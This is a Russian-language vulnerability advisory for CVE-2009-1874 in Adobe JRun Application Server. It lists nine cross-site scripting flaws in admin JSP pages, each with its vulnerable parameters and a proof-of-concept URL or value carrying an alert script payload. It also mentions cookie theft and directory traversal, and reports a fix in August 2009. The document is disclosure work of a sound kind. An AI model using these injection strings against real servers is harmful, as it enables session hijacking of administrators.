
CVE-2009-1874: Множественные уязвимости межсайтового скриптинга в Adobe JRun Application Server.
Вендор
Adobe
Продукт
Adobe JRun Application Server
Тип уязвимости
Множественные уязвимости межсайтового скриптинга
Reported
20.01.2009
Date of Public Advisory
17.08.2009
Подтверждение
Детальное описание
Используя обнаруженные уязвимости, злоумышленник может перехватить cookie администратора и выполнять любые действия в системе от его имени.
Также злоумышленник может прочитать любой файл, используя уязвимость обхода каталога.
1. Уязвимость межсайтового скриптинга обнаружена в скрипте logviewer.jsp
GET parameters «case», «logfile», «num», «readStart», «reverse», «startAt».
Пример
http://[server]/server/[profile]/logging/logviewer.jsp?case=»><script>alert(‘DSecRG XSS’)</script>
http://[server]/server/[profile]/logging/logviewer.jsp?logfile=<IMG SRC=»javascript:alert(‘DSecRG XSS’);»>
http://[server]/server/[profile]/logging/logviewer.jsp?readDir=FALSE&readStart=<script>alert(‘DSecRG XSS’)</script>
http://[server]/server/[profile]/logging/logviewer.jsp?startAt=<script>alert(‘DSecRG XSS’)</script>
2. Уязвимость межсайтового скриптинга обнаружена в скрипте redeployear.jsp
Уязвимый GET параметр «redeployEar.url».
Пример
http://[server]/server/[profile]/deployments/redeployear.jsp?redeployEar.url=<script>alert(‘DSecRG XSS’)</script>
3. Уязвимость межсайтового скриптинга обнаружена в скрипте undeployear.jsp
Уязвимый GET параметр «deployEar.url».
Пример
http://[server]/server/[profile]/deployments/undeployear.jsp?deployEar.delete=&deployEar.url=<script>alert(‘DSecRG XSS’)</script>
4. Уязвимость межсайтового скриптинга обнаружена в скрипте deployear.jsp
Уязвимый GET параметр «form.deploymentFilePath».
Пример
http://[server]/server/[profile]/deployments/deployear.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>
5. Уязвимость межсайтового скриптинга обнаружена в скрипте deployejb.jsp
Уязвимый GET параметр «form.deploymentFilePath».
Пример
http://[server]/server/[profile]/deployments/deployejb.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>
6. Уязвимость межсайтового скриптинга обнаружена в скрипте deployrar.jsp
Уязвимый GET параметр «form.deploymentFilePath».
Пример
http://[server]/server/[profile]/deployments/deployrar.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>
7. Уязвимость межсайтового скриптинга обнаружена в скрипте deploywar.jsp
Уязвимый GET параметр «form.deploymentFilePath».
Пример
http://[server]/server/[profile]/deployments/deploywar.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>
8. Уязвимость хранимого межсайтового скриптинга обнаружена в скрипте jvmsettings.jsp
Уязвимый GET параметр «vmSettings.javaHome», «vmSettings.vmArgs», «vmSettings.classpaths».
Пример
vmSettings.javaHome=»><script>alert(‘DSecRG XSS’)</script>
vmSettings.vmArgs=</TEXTAREA><script>alert(‘DSecRG XSS’)</script>
vmSettings.classpaths = <script>alert(‘DSecRG XSS’)</script>
9. Уязвимость межсайтового скриптинга обнаружена в скрипте overviewwar.jsp
Уязвимый POST параметр «generalSettingsForm.replicationBuddyList», «generalSettingsForm.documentRoot».
Пример
generalSettingsForm.replicationBuddyList = <script>alert(‘DSecRG XSS’)</script>
generalSettingsForm.documentRoot = «><script>alert(‘DSecRG XSS’)</script>
Решение
Уязвимость была устранена 17 августа 2009 года.